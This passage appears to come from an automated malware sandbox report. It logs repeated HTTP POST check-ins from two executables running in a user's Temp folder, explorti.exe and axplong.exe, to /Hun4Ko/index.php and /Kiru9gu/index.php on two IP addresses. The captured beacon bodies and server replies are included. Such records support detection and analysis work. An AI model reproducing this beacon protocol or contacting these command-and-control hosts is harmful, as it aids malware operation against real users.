                                                                                        62192.168.2.64990377.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:42.288934946 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:43.026869059 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:42 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:43.030962944 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:43.251970053 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:43 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        63192.168.2.64990477.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:42.290827990 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:43.026781082 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:42 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:43.030889034 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:43.256120920 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:43 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        64192.168.2.64990577.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:43.364552975 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:44.094571114 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:43 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:44.095176935 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:44.322462082 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        65192.168.2.64990677.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:43.378118038 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:44.089291096 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:43 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:44.090151072 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:44.321094036 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        66192.168.2.64990777.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:44.446865082 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:45.166574955 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:45.167368889 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:45.386400938 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        67192.168.2.64990877.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:44.446926117 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:45.176438093 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:45.177066088 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:45.398585081 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:45 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        68192.168.2.64990977.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:45.495912075 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:46.206579924 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:46 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:46.209904909 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:46.437573910 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:46 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        69192.168.2.64991077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:45.518095016 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:46.217207909 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:46 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:46.218107939 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:46.441747904 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:46 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        70192.168.2.64991177.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:46.555386066 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:47.271807909 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:47 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:47.272607088 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:47.505770922 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:47 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        71192.168.2.64991277.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:46.555465937 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:47.279299974 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:47 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:47.279932976 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:47.507451057 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:47 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        72192.168.2.64991377.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:47.624859095 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:48.359190941 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:48 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:48.360027075 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:48.592356920 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:48 GMT
